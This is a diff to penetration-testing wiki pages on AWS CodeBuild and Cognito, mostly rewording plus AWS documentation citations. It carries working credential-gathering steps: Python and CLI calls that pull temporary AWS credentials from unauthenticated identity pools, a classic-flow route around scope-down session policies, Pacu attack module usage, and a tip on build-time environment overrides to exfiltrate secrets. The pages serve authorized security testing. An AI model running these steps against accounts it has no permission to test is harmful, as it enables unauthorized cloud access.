 1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance.
 2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process.
 3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment.
 
-AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability.
+CodeBuild can be run from the AWS console, AWS CLI, or SDKs and can be added as a build or test action in CodePipeline.<sup>[[2]](#references)</sup>
 
-### **Github/Gitlab/Bitbucket Credentials**
+### **GitHub/GitLab/Bitbucket Credentials**
 
 #### **Default source credentials**
 
-This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials.
+CodeBuild supports account-level default source credentials that apply to all projects when no project- or source-level credential is specified. Depending on the provider and authentication method, these credentials can be a provider token, an app or OAuth connection, a Secrets Manager secret, or a CodeConnections connection.<sup>[[3]](#references)[[4]](#references)</sup>
 
-The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs.
+For CodeBuild-managed source credentials, the API exposes authentication and source-provider metadata plus the token ARN, not the raw token value.<sup>[[3]](#references)[[5]](#references)</sup>
 
 #### Custom source credential
 
-Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**.
+Custom source credentials can override the account-level default for a project's source. Depending on the source provider, CodeBuild supports access tokens, app passwords, OAuth, CodeConnections, and Secrets Manager credentials; when the Secrets Manager option is used, the provider credential is stored in that secret.<sup>[[3]](#references)[[4]](#references)</sup>
 
-This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one.
+This allows **different CodeBuild projects to use different configured accesses** to the providers instead of just using the configured default one.<sup>[[4]](#references)</sup>
 
 ### Enumeration
 
+The AWS CLI provides commands for enumerating CodeBuild projects, builds, and related resources.<sup>[[6]](#references)</sup> `list-source-credentials` returns the source-provider and authentication metadata plus the token ARN; it does not return the token value.<sup>[[5]](#references)</sup>
+
 ```bash
 # List external repo creds (such as github tokens)
-## It doesn't return the token but just the ARN where it's located
 aws codebuild list-source-credentials
 
 # Projects
 aws codebuild list-shared-projects
 aws codebuild list-projects
-aws codebuild batch-get-projects --names <project_name> # Check for creds in env vars
+aws codebuild batch-get-projects --names <project_name> # Inspect source and environment settings
 
 # Builds
 aws codebuild list-builds
@@ -49,8 +48,12 @@ aws codebuild list-reports
 aws codebuild describe-test-cases --report-arn <ARN>
 ```
 
+`batch-get-projects` returns the project environment variables, so inspect them for accidentally exposed credentials. AWS warns that `PLAINTEXT` environment variables can be displayed in the console and CLI and recommends Parameter Store or Secrets Manager for sensitive values.<sup>[[8]](#references)</sup>
+
+The build and report commands above can enumerate build IDs, report ARNs, and test-case details for further investigation.<sup>[[6]](#references)[[9]](#references)[[10]](#references)</sup>
+
 > [!TIP]
-> If you have `codebuild:StartBuild`, remember you can often override env vars at build time (`--environment-variables-override`). This is enough for some attacks even without `UpdateProject` or `buildspec` overrides (for example: redirecting artifact/upload buckets to exfiltrate secrets, or abusing language/runtime env vars to execute commands).
+> If you have `codebuild:StartBuild`, remember you can often override env vars at build time (`--environment-variables-override`). The override applies only to that build request and does not modify the project settings.<sup>[[7]](#references)</sup> This is enough for some attacks even without `UpdateProject` or `buildspec` overrides (for example: redirecting artifact/upload buckets to exfiltrate secrets, or abusing language/runtime env vars to execute commands).
 
 ### Privesc
 
@@ -74,9 +77,15 @@ In the following page, you can check how to **abuse codebuild permissions to esc
 
 ## References
 
-- [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html)
+- [1] [Use AMS SSP to provision AWS CodeBuild in your AMS account - AMS Advanced User Guide](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html)
+- [2] [What is AWS CodeBuild? - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/welcome.html)
+- [3] [Access your source provider in CodeBuild - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/access-tokens.html)
+- [4] [Multiple access tokens in CodeBuild - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/multiple-access-tokens.html)
+- [5] [ListSourceCredentials - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_ListSourceCredentials.html)
+- [6] [Command line reference for AWS CodeBuild - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/cmd-ref.html)
+- [7] [start-build - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/codebuild/start-build.html)
+- [8] [batch-get-projects - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/codebuild/batch-get-projects.html)
+- [9] [list-reports - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/codebuild/list-reports.html)
+- [10] [describe-test-cases - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/codebuild/describe-test-cases.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
@@ -1,15 +1,13 @@
 # AWS - Cognito Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Cognito
 
-Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple.
+Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple.<sup>[[1]](#references)[[2]](#references)</sup>
 
-Central to Amazon Cognito are two primary components:
+Central to Amazon Cognito are two primary components:<sup>[[1]](#references)</sup>
 
-1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**.
-2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication.
+1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**.<sup>[[1]](#references)[[2]](#references)</sup>
+2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ### **User pools**
 
@@ -28,6 +26,8 @@ cognito-identity-pools.md
 {{#endref}}
 
 ## Enumeration
+
+The following AWS CLI operations enumerate identity-pool metadata and identities, Cognito Sync datasets, and user-pool resources such as users, groups, app clients, identity providers, import jobs, MFA, and risk configuration.<sup>[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 # List Identity Pools
@@ -75,11 +75,11 @@ aws cognito-idp describe-risk-configuration --user-pool-id <user-pool-id>
 
 ### Identity Pools - Unauthenticated Enumeration
 
-Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles).
+With guest access enabled, knowing the **Identity Pool ID** might be enough to request temporary credentials for the role associated with **unauthenticated** users. [**Check how here**](cognito-identity-pools.md#accessing-iam-roles).<sup>[[3]](#references)[[8]](#references)</sup>
 
 ### User Pools - Unauthenticated Enumeration
 
-Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.**
+When a public app client permits self-registration, its **App client ID** (often found in client-side source code) identifies the client for registration and other unauthenticated operations.<sup>[[2]](#references)[[7]](#references)</sup> Depending on the pool's settings and response behavior, testers may assess username enumeration, password-guessing, and new-user registration. [**Check how here**](cognito-user-pools.md#registration).
 
 ## Privesc
 
@@ -99,8 +99,18 @@ Even if you **don't know a valid username** inside Cognito, you might be able to
 ../../aws-persistence/aws-cognito-persistence/README.md
 {{#endref}}
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [What is Amazon Cognito?](https://docs.aws.amazon.com/cognito/latest/developerguide/what-is-amazon-cognito.html)
+- [2] [Amazon Cognito user pools](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools.html)
+- [3] [Identity pools console overview - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/identity-pools.html)
+- [4] [cognito-identity — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/)
+- [5] [cognito-sync — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cognito-sync/)
+- [6] [cognito-idp — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/)
+- [7] [Application-specific settings with app clients - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/user-pool-settings-client-apps.html)
+- [8] [Security best practices for Amazon Cognito identity pools](https://docs.aws.amazon.com/cognito/latest/developerguide/identity-pools-security-best-practices.html)
+
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
@@ -1,28 +1,29 @@
 # Cognito Identity Pools
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include:
+Identity pools let applications exchange guest or federated identities for temporary AWS credentials. Those credentials can be used to call AWS services such as Amazon S3 and DynamoDB, subject to the IAM role and session policies.<sup>[[1]](#references)[[9]](#references)</sup>
+
+Supported identity providers include:<sup>[[1]](#references)</sup>
 
 - Amazon Cognito user pools
 - Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple
 - Providers compliant with OpenID Connect (OIDC)
 - SAML (Security Assertion Markup Language) identity providers
-- Developer authenticated identities
+- Developer-authenticated identities
+
+The following example configures the default authenticated and unauthenticated IAM roles for an existing identity pool. `SetIdentityPoolRoles` changes the roles used by subsequent `GetCredentialsForIdentity` calls; it does not register an identity provider.<sup>[[2]](#references)</sup>
+
+The caller must use IAM credentials authorized to call `cognito-identity:SetIdentityPoolRoles`.<sup>[[2]](#references)</sup>
 
 ```python
-# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
 import boto3
 
-# Initialize the Amazon Cognito Identity client
 client = boto3.client('cognito-identity')
 
-# Assume you have already created an identity pool and obtained the IdentityPoolId
+# Assume you have already created an identity pool and obtained its ID
 identity_pool_id = 'your-identity-pool-id'
 
-# Add an identity provider to the identity pool
 response = client.set_identity_pool_roles(
     IdentityPoolId=identity_pool_id,
     Roles={
@@ -31,27 +32,26 @@ response = client.set_identity_pool_roles(
     }
 )
 
-# Print the response from AWS
 print(response)
 ```
 
 ### Cognito Sync
 
-To generate Identity Pool sessions, you first need to **generate and Identity ID**. This Identity ID is the **identification of the session of that user**. These identifications can have up to 20 datasets that can store up to 1MB of key-value pairs.
+To use Cognito Sync, obtain an identity ID associated with the identity pool. An identity can have up to 20 datasets, and each dataset can hold up to 1 MB of key-value data. The service associates that data with the identity so it can be synchronized across the user's devices.<sup>[[3]](#references)</sup>
 
-This is **useful to keep information of a user** (who will be always using the same Identity ID).
+Cognito Sync synchronizes local dataset changes with the service when the application invokes its synchronization operation. AWS recommends AWS AppSync for new applications instead of Cognito Sync.<sup>[[3]](#references)</sup>
 
-Moreover, the service **cognito-sync** is the service that allow to **manage and syncronize this information** (in the datasets, sending info in streams and SNSs msgs...).
+Amazon Cognito Sync moved to maintenance status and became unavailable to new customers on July 30, 2026; existing customers can continue using it.<sup>[[18]](#references)</sup>
 
 ### Tools for pentesting
 
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, includes the `cognito__enum` and `cognito__attack` modules. The modules enumerate Cognito resources, flag weak password and MFA configurations, inspect user-modifiable attributes, create or authenticate users (including MFA workflows), retrieve identity-pool credentials, and test escalation through custom attributes and roles in identity-token claims.<sup>[[4]](#references)[[5]](#references)</sup>
 
-For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+For a description of the modules' functions, see part 2 of the [Pacu Cognito write-up](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). The [Pacu repository](https://github.com/RhinoSecurityLabs/pacu) contains installation instructions.<sup>[[4]](#references)[[5]](#references)</sup>
 
 #### Usage
 
-Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
+Sample `cognito__attack` usage to attempt user creation and the available escalation paths against a given identity pool and user-pool client:<sup>[[5]](#references)</sup>
 
 ```bash
 Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
@@ -59,13 +59,13 @@ us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
 
-Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
+Sample `cognito__enum` usage to gather user pools, user-pool clients, identity pools, and users visible in the current AWS account:<sup>[[5]](#references)</sup>
 
 ```bash
 Pacu (new:test) > run cognito__enum
 ```
 
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation.
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a Python CLI tool that implements unwanted account creation, account-oracle, and identity-pool escalation tests.<sup>[[6]](#references)</sup>
 
 #### Installation
 
@@ -79,96 +79,115 @@ $ pip install cognito-scanner
 $ cognito-scanner --help
 ```
 
-For more information check https://github.com/padok-team/cognito-scanner
+The [Cognito Scanner repository](https://github.com/padok-team/cognito-scanner) documents these installation and usage commands.<sup>[[6]](#references)</sup>
 
 ## Accessing IAM Roles
 
 ### Unauthenticated
 
-The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable).
+When guest access is enabled, a client can use an identity pool ID to obtain an identity ID and temporary AWS credentials without presenting an identity-provider token. Identity pool IDs use the `REGION:GUID` format; in a web or mobile application the pool ID is normally a public configuration value and is not practically brute-forceable.<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
 
 > [!TIP]
-> The **IAM Cognito unauthenticated role created via is called** by default `Cognito_<Identity Pool name>Unauth_Role`
+> A commonly seen name for the unauthenticated role created during Cognito setup is `Cognito_<Identity Pool name>Unauth_Role`; verify the actual role ARN because role names can be customized.
 
-If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with:
+If you find an identity-pool ID for a pool that allows unauthenticated access, the following calls obtain temporary credentials through `GetId` and `GetCredentialsForIdentity`:<sup>[[7]](#references)[[8]](#references)</sup>
 
 ```python
 import requests
 
-region = "us-east-1"
-id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
+identity_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
+region = identity_pool_id.split(':', 1)[0]
 url = f'https://cognito-identity.{region}.amazonaws.com/'
-headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
-params = {'IdentityPoolId': id_pool_id}
+headers = {
+    "X-Amz-Target": "AWSCognitoIdentityService.GetId",
+    "Content-Type": "application/x-amz-json-1.1",
+}
 
-r = requests.post(url, json=params, headers=headers)
-json_resp = r.json()
+response = requests.post(
+    url,
+    json={'IdentityPoolId': identity_pool_id},
+    headers=headers,
+)
+identity_response = response.json()
 
-if not "IdentityId" in json_resp:
-    print(f"Not valid id: {id_pool_id}")
-    exit
+if "IdentityId" not in identity_response:
+    raise SystemExit(f"Not a valid identity-pool ID: {identity_pool_id}")
 
-IdentityId = r.json()["IdentityId"]
-
-params = {'IdentityId': IdentityId}
-
+identity_id = identity_response["IdentityId"]
 headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
-r = requests.post(url, json=params, headers=headers)
+response = requests.post(
+    url,
+    json={'IdentityId': identity_id},
+    headers=headers,
+)
 
-print(r.json())
+print(response.json())
 ```
 
-Or you could use the following **aws cli commands**:
+The equivalent AWS CLI commands are public and do not require signed AWS credentials. Set `<region>` to the region in the identity-pool ID:<sup>[[7]](#references)[[8]](#references)</sup>
 
 ```bash
-aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
-aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign
+aws cognito-identity get-id \
+  --identity-pool-id <identity_pool_id> \
+  --region <region> \
+  --no-sign-request
+aws cognito-identity get-credentials-for-identity \
+  --identity-id <identity_id> \
+  --region <region> \
+  --no-sign-request
 ```
 
 > [!WARNING]
-> Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section.
+> Guest identities can receive permissions when the unauthenticated IAM role grants them. In the enhanced flow, however, Amazon Cognito also applies scope-down session policies; effective access is the intersection of the role and session policies and is limited to the documented services and actions.<sup>[[9]](#references)</sup>
 
 ### Enhanced vs Basic Authentication flow
 
-The previous section followed the **default enhanced authentication flow**. This flow sets a **restrictive** [**session policy**](../../aws-basic-information/index.html#session-policies) to the IAM role session generated. This policy will only allow the session to [**use the services from this list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (even if the role had access to other services).
+The previous section used the default enhanced authentication flow. For unauthenticated users, this flow adds a restrictive [session policy](../../aws-basic-information/index.html#session-policies) and an AWS managed session policy to the role session. These policies limit the session to the services and actions in the [scope-down list](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services), even when the IAM role itself permits more access.<sup>[[9]](#references)[[10]](#references)</sup>
 
-However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**.
+If the identity pool has **Basic (Classic) Flow** enabled, the client can instead request an OpenID token and call AWS STS directly. This avoids the enhanced flow's Cognito-applied scope-down policy, but the target role's trust policy and any attached or session policies still constrain the resulting credentials.<sup>[[9]](#references)[[10]](#references)[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
 ```bash
-# Get auth ID
-aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
+# Get an identity ID
+aws cognito-identity get-id \
+  --identity-pool-id <identity_pool_id> \
+  --region <region> \
+  --no-sign-request
 
-# Get login token
-aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign
+# Get an OpenID token
+aws cognito-identity get-open-id-token \
+  --identity-id <identity_id> \
+  --region <region> \
+  --no-sign-request
 
-# Use login token to get IAM session creds
-## If you don't know the role_arn use the previous enhanced flow to get it
-aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign
+# Exchange the token for IAM session credentials
+## If you do not know the role ARN, use the enhanced flow to identify it.
+aws sts assume-role-with-web-identity \
+  --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" \
+  --role-session-name sessionname \
+  --web-identity-token <token> \
+  --no-sign-request
 ```
 
-> [!WARNING]
-> If you receive this **error**, it's because the **basic flow is not enabled (default)**
+If `GetOpenIdToken` fails, inspect the identity pool's `AllowClassicFlow` setting. When classic flow is disabled, a common response is `Basic (classic) flow is not enabled, please use enhanced flow`. Classic flow is also unsupported for pools using role mappings; AWS returns `Basic (classic) flow is not supported with RoleMappings, please use enhanced flow.` In either case, use the enhanced flow unless the pool is explicitly configured for an authorized classic-flow test.<sup>[[10]](#references)[[15]](#references)[[17]](#references)</sup>
 
-> `An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.`
-
-Having a set of IAM credentials you should check [which access you have](../../index.html#whoami) and try to [escalate privileges](../../aws-privilege-escalation/index.html).
+Having a set of IAM credentials, check [which access you have](../../index.html#whoami) and try to [escalate privileges](../../aws-privilege-escalation/index.html).
 
 ### Authenticated
 
 > [!NOTE]
-> Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials.
+> Authenticated users may receive different permissions. If the application permits self-registration, create a test user and obtain the credentials issued to an authenticated identity.
 
-There could also be **roles** available for **authenticated users accessing the Identity Poo**l.
-
-For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**.
+Identity pools can assign roles to authenticated users. Access to the configured identity provider may be required; when the provider is a Cognito user pool, test whether the application permits a new user to register.<sup>[[1]](#references)[[16]](#references)</sup>
 
 > [!TIP]
-> The **IAM Cognito athenticated role created via is called** by default `Cognito_<Identity Pool name>Auth_Role`
+> A commonly seen name for the authenticated role created during Cognito setup is `Cognito_<Identity Pool name>Auth_Role`; verify the actual role ARN because role names can be customized.
 
-Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured).
+The following example assumes that you have logged in to a Cognito user pool configured as an identity-pool provider. Other provider types can use different provider names and token formats.<sup>[[1]](#references)[[10]](#references)</sup>
+
+The AWS CLI accepts the provider name and token as a `Logins` map. When a token contains multiple role claims, `--custom-role-arn` can request a preferred role.<sup>[[8]](#references)[[16]](#references)</sup>
 
 <pre class="language-bash"><code class="lang-bash">
-# Updated format
+# Current JSON map format
 aws cognito-identity get-id \
   --identity-pool-id <identity_pool_id> \
   --logins '{"cognito-idp.<region>.amazonaws.com/<user_pool_id>": "<ID_TOKEN>"}'
@@ -183,7 +202,7 @@ aws cognito-identity get-credentials-for-identity \
   --logins '{"cognito-idp.<region>.amazonaws.com/<user_pool_id>": "<ID_TOKEN>"}'
 </code></pre>
 
-> **Deprecated format** — these may no longer work with current AWS CLI:
+> **Legacy format** — the current JSON map format above is preferred:
 <pre class="language-bash"><code class="lang-bash">
 aws cognito-identity get-id \
   --identity-pool-id <identity_pool_id> \
@@ -200,10 +219,27 @@ aws cognito-identity get-credentials-for-identity \
 </code></pre>
 
 > [!WARNING]
-> It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**.
+> Identity pools can select different IAM roles from provider claims or claim-matching rules. If you can access multiple users through the same or different providers, test each identity because the resulting role can differ.<sup>[[13]](#references)[[16]](#references)</sup>
+
+## References
+
+- [1] [Amazon Cognito identity pools](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-identity.html)
+- [2] [SetIdentityPoolRoles - Amazon Cognito Federated Identities](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_SetIdentityPoolRoles.html)
+- [3] [Synchronizing data across clients - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/synchronizing-data.html)
+- [4] [Pacu - The AWS exploitation framework](https://github.com/RhinoSecurityLabs/pacu)
+- [5] [Attacking AWS Cognito with Pacu (p2)](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2)
+- [6] [Cognito Scanner](https://github.com/padok-team/cognito-scanner)
+- [7] [get-id - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-id.html)
+- [8] [get-credentials-for-identity - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-credentials-for-identity.html)
+- [9] [IAM roles - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services)
+- [10] [Identity pools authentication flow - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/authentication-flow.html)
+- [11] [GetOpenIdToken - Amazon Cognito Federated Identities](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
+- [12] [get-open-id-token - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-open-id-token.html)
+- [13] [AssumeRoleWithWebIdentity - AWS Security Token Service](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
+- [14] [assume-role-with-web-identity - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html)
+- [15] [CreateIdentityPool - Amazon Cognito Federated Identities](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_CreateIdentityPool.html)
+- [16] [Using role-based access control - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/role-based-access-control.html)
+- [17] [Out of box set-up fails with an uncaught exception when an existing Cognito IDP is used](https://github.com/aws-observability/aws-rum-web/issues/345)
+- [18] [AWS Service Availability Updates](https://aws.amazon.com/about-aws/whats-new/2026/06/aws-service-availability/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
@@ -1,12 +1,10 @@
 # Cognito User Pools
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
+A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.<sup>[[1]](#references)</sup>
 
-User pools provide:
+User pools provide the following capabilities.<sup>[[1]](#references)</sup>
 
 - Sign-up and sign-in services.
 - A built-in, customizable web UI to sign in users.
@@ -15,18 +13,17 @@ User pools provide:
 - Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification.
 - Customized workflows and user migration through AWS Lambda triggers.
 
-**Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool.
+During an assessment, inspect client-side source and configuration for the **user pool ID** and **app client ID**. A client secret is only present for confidential app clients and must not be treated as a public value.<sup>[[18]](#references)</sup>
 
 ### Potential attacks
 
-- **Registration**: By default a user can register himself, so he could create a user for himself.
-- **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack.
+- **Registration**: If self-service sign-up is enabled, anyone who can reach the client can create a user for himself; otherwise only an administrator or another configured workflow can create users.<sup>[[1]](#references)</sup>
+- **User enumeration**: When user-existence error suppression is not effective for the tested identifier, registration responses can reveal whether a username already exists. Test the app client's `PreventUserExistenceErrors` setting and alias configuration before treating this as an oracle.<sup>[[2]](#references)</sup>
 - **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**.
 
 ### Tools for pentesting
 
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\
-  For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu) includes the `cognito__enum` and `cognito__attack` modules. The enumeration module collects Cognito resources and flags weak or user-modifiable configurations; the attack module automates selected registration, identity-pool, attribute, and role checks.<sup>[[3]](#references)[[4]](#references)</sup> For a detailed description, see the [Pacu Cognito modules write-up](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2/); for installation instructions, see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
 
 ```bash
 # Run cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account
@@ -38,7 +35,7 @@ us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
 
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info.
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a Python CLI that implements unwanted account creation, an account oracle, and identity-pool escalation checks.<sup>[[5]](#references)</sup>
 
 ```bash
 # Install
@@ -47,7 +44,7 @@ pip install cognito-scanner
 cognito-scanner --help
 ```
 
-- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users.
